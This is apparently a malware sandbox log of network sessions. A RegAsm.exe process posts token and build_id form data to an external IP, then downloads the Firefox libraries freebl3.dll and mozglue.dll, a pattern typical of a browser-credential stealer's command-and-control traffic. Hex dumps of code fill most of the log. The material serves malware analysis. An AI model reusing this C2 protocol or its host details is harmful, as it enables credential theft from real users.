2024-09-26 23:37:45 UTC	16384	IN	Data Raw: 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: \|$2@3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-09-26 23:37:45 UTC	16384	IN	Data Raw: 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: td\|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
2024-09-26 23:37:45 UTC	16384	IN	Data Raw: ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 Data Ascii: _^][YVt$W\|$FVBhtw7t7Vg_^jjjh,g!t$
2024-09-26 23:37:45 UTC	16384	IN	Data Raw: 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$
2024-09-26 23:37:45 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49718	5.75.211.162	443	1092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:37:48 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAAFBAKECAEGCBFIEGDG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 829 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:37:48 UTC	829	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 66 37 31 33 31 34 36 64 30 61 38 39 38 61 32 62 32 63 64 34 65 38 62 61 32 33 32 38 38 66 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 32 36 37 33 35 63 62 65 38 63 61 39 65 37 35 37 31 32 66 66 65 33 61 61 34 30 63 34 61 36 30 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74 Data Ascii: ------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="token"daf713146d0a898a2b2cd4e8ba23288f------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="build_id"b26735cbe8ca9e75712ffe3aa40c4a60------DAAFBAKECAEGCBFIEGDGCont
2024-09-26 23:37:49 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:37:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:37:49 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49719	5.75.211.162	443	1092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:37:49 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHJJEGHIIDAFIDHJDHJE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:37:49 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 48 4a 4a 45 47 48 49 49 44 41 46 49 44 48 4a 44 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 66 37 31 33 31 34 36 64 30 61 38 39 38 61 32 62 32 63 64 34 65 38 62 61 32 33 32 38 38 66 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 4a 45 47 48 49 49 44 41 46 49 44 48 4a 44 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 32 36 37 33 35 63 62 65 38 63 61 39 65 37 35 37 31 32 66 66 65 33 61 61 34 30 63 34 61 36 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 4a 45 47 48 49 49 44 41 46 49 44 48 4a 44 48 4a 45 0d 0a 43 6f 6e 74 Data Ascii: ------DHJJEGHIIDAFIDHJDHJEContent-Disposition: form-data; name="token"daf713146d0a898a2b2cd4e8ba23288f------DHJJEGHIIDAFIDHJDHJEContent-Disposition: form-data; name="build_id"b26735cbe8ca9e75712ffe3aa40c4a60------DHJJEGHIIDAFIDHJDHJECont
2024-09-26 23:37:50 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:37:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:37:50 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49720	5.75.211.162	443	1092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:37:50 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHDGCGIDAKEBKECAFIEH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:37:50 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 48 44 47 43 47 49 44 41 4b 45 42 4b 45 43 41 46 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 66 37 31 33 31 34 36 64 30 61 38 39 38 61 32 62 32 63 64 34 65 38 62 61 32 33 32 38 38 66 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 47 43 47 49 44 41 4b 45 42 4b 45 43 41 46 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 32 36 37 33 35 63 62 65 38 63 61 39 65 37 35 37 31 32 66 66 65 33 61 61 34 30 63 34 61 36 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 47 43 47 49 44 41 4b 45 42 4b 45 43 41 46 49 45 48 0d 0a 43 6f 6e 74 Data Ascii: ------EHDGCGIDAKEBKECAFIEHContent-Disposition: form-data; name="token"daf713146d0a898a2b2cd4e8ba23288f------EHDGCGIDAKEBKECAFIEHContent-Disposition: form-data; name="build_id"b26735cbe8ca9e75712ffe3aa40c4a60------EHDGCGIDAKEBKECAFIEHCont
2024-09-26 23:37:51 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:37:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:37:51 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49721	5.75.211.162	443	1092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:37:51 UTC	196	OUT	GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:37:52 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:37:52 GMT Content-Type: application/octet-stream Content-Length: 685392 Connection: close Last-Modified: Thursday, 26-Sep-2024 23:37:52 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 23:37:52 UTC	16122	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
2024-09-26 23:37:52 UTC	16384	IN	Data Raw: ff ff ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f Data Ascii: E}1M1XM}}UU1M1UM] EH]EE\|1E1EMMuuU1M1Mu]uM11U\|uuMM1]1x
2024-09-26 23:37:52 UTC	16384	IN	Data Raw: c1 c2 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]w
2024-09-26 23:37:52 UTC	16384	IN	Data Raw: 7d 08 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 Data Ascii: }00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
2024-09-26 23:37:52 UTC	16384	IN	Data Raw: 0e 81 e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
2024-09-26 23:37:52 UTC	16384	IN	Data Raw: 00 00 c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f Data Ascii: EEPZ}EPYEPYEPYFMPQW\|EppEPH[FMPQuo=EppEPN@w,0w
2024-09-26 23:37:52 UTC	16384	IN	Data Raw: 04 8d 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
2024-09-26 23:37:52 UTC	16384	IN	Data Raw: 7d 88 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff Data Ascii: }eUeLXee0@eeeue0UEeeUeee $
2024-09-26 23:37:52 UTC	16384	IN	Data Raw: 38 8b 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 Data Ascii: 8O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEE
2024-09-26 23:37:52 UTC	16384	IN	Data Raw: 1c c1 ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 Data Ascii: ,0<48%8A)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49722	5.75.211.162	443	1092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:37:53 UTC	196	OUT	GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:37:53 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:37:53 GMT Content-Type: application/octet-stream Content-Length: 608080 Connection: close Last-Modified: Thursday, 26-Sep-2024 23:37:53 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
